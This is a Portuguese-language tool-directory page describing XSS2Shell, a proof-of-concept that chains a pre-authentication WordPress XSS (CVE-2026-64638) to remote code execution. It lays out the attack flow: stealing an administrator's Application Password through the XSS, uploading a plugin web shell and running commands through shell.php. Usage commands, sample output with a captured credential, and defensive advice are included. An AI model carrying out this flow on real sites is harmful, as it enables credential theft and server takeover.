Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
XSS2Shell — # Exploit PoC de XSS pré-authentificação para RCE no Wordpress (xss2shell & CVE-2026-64638) | Kitploit
Ferramentas/GitHubGitHub/wordsec/xss2shell
Geração de PayloadsExploraçãoExploração de Aplicações WebPós-ExploraçãoSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubwordsec/xss2shell

XSS2Shell

# Exploit PoC de XSS pré-authentificação para RCE no Wordpress (xss2shell & CVE-2026-64638)

Ver Repositório
611há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

XSS2Shell

XSS2Shell é uma prova de conceito educacional para a CVE-2026-64638, demonstrando o impacto de um problema de XSS pré-autenticação em instalações WordPress vulneráveis. Com a participação explícita de um administrador, o PoC captura uma Senha de Aplicativo do WordPress, publica uma página temporária, envia um plugin de teste e verifica se o endpoint de shell resultante consegue executar um comando.

Contexto técnico: XSS pré-autenticação no WordPress para RCE: CVE-2026-64638

Somente para fins educacionais e testes autorizados. Execute esta ferramenta apenas em sites WordPress que você possua ou para os quais tenha permissão por escrito para avaliar. Não a use para atingir administradores de terceiros ou sistemas de produção.

Requisitos

  • Python 3.7 ou mais recente
  • Uma instalação de teste WordPress acessível
  • Um administrador que possa entrar no alvo e abrir a URL do atacante
  • Acesso de rede do navegador do administrador ao endereço do listener
  • Sem pacotes Python de terceiros

Uso

root@kitploit:~
python3 xss2shell_poc.py -t http://wordpress.research.local --lhost 192.168.1.227 --lport 8080 -c "whoami"

Opções

OpçãoObrigatórioDescrição
-t, --targetSimURL base do WordPress, incluindo http:// ou https://
-c, --commandSimComando a ser executado depois que o shell estiver disponível
--lhostNãoIP do listener para vincular e anunciar; o padrão é o IP da LAN detectado
--lportNãoPorta do listener; 0 seleciona uma porta disponível aleatória
--keepNãoMantém os artefatos publicados em vez de excluir a página temporária

A URL do alvo é normalizada automaticamente, portanto a barra final é opcional.

Fluxo do operador

  1. A ferramenta verifica se /wp-login.php está acessível e parece uma página de login do WordPress.
  2. Ela inicia um listener HTTP local e exibe a URL do listener.
  3. O administrador autorizado entra no alvo e abre essa URL.
  4. O fluxo do navegador solicita uma Senha de Aplicativo e envia o resultado ao listener.
  5. O PoC publica uma página temporária do atacante usando as credenciais capturadas.
  6. A página envia o plugin de teste com a sessão do administrador.
  7. A ferramenta verifica shell.php e executa o comando solicitado.

O listener deve ser alcançável pelo navegador do administrador. NAT, firewall, proxy, bloqueio de pop-up e regras de conteúdo misto podem impedir a conclusão do fluxo do navegador.

Exemplo de saída

root@kitploit:~
 __          __           _  _____           
 \ \        / /          | |/ ____|          
  \ \  /\  / /__  _ __ __| | (___   ___  ___ 
   \ \/  \/ / _ \| '__/ _` |\___ \ / _ \/ __|
    \  /\  / (_) | | | (_| |____) |  __/ (__ 
     \/  \/ \___/|_|  \__,_|_____/ \___|\___|
                                              
                                              
xss2shell & CVE-2026-64638 |  https://wordsec.net/ - Education Purpose Only


============================================================
[*] XSS2Shell starting ...
[*] Checking target: http://wordpress.research.local/wp-login.php
[+] Admin panel found: http://wordpress.research.local/wp-login.php
[+] Attacker server listening: 192.168.1.227:8080
[*] On the target website, the admin must open this page and log in:
    ->  http://wordpress.research.local/wp-login.php
[*] Then the admin opens the link that was sent to them:
    ->  http://192.168.1.227:8080/
[*] Waiting for the admin to visit (Ctrl+C to stop) ...
[+] Child popup document initialized
[+] Popup window ready, XSS payload prepared
[+] Application Password saved to xss2shell_creds.json for later runs (shell: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php)
[+] XSS payload POSTed to wp-login.php
[+] Application Password stolen: user=admin pass=3SGS Loba 2Txw EzWz EbZC xZst (saved to xss2shell_creds.json)
[+] Attacker page published: http://wordpress.research.local/xss2shell-1786125273210/
[+] Plugin ZIP upload request sent with the victim's session
[+] Shell reachable: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php

============================================================
[+] Command output:
www-data
============================================================
[*] Cleanup: published page deleted (id=61)
[*] Cleanup: Application Password, plugin shell, and saved credentials preserved

[+] Shell link: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php?cmd=whoami
[+] Done.

Artefatos e limpeza

Execuções bem-sucedidas salvam a Senha de Aplicativo capturada em xss2shell_creds.json para reutilização em execuções posteriores. A página publicada temporária é excluída automaticamente após o comando, a menos que --keep seja usado.

O plugin de teste, o endpoint do shell, a Senha de Aplicativo e as credenciais salvas são intencionalmente preservados pelo PoC atual. Remova-os manualmente do site de teste após uma avaliação autorizada e exclua xss2shell_creds.json localmente.

Trate o arquivo de credenciais como sensível e nunca o envie para o controle de versão.

Orientações defensivas

  • Atualize o WordPress para uma versão não afetada pela CVE-2026-64638.
  • Reforce a autenticação forte do administrador e habilite a 2FA.
  • Restrinja a instalação de plugins e a criação de senhas de aplicativo a funções confiáveis.
  • Revise as Senhas de Aplicativo do administrador, as páginas publicadas e os plugins instalados recentemente após os testes.
  • Monitore e bloqueie solicitações inesperadas para os endpoints de upload de plugins e da REST API.

Licença

Use a licença incluída neste repositório.

Feito por WordSec

Baixar ferramenta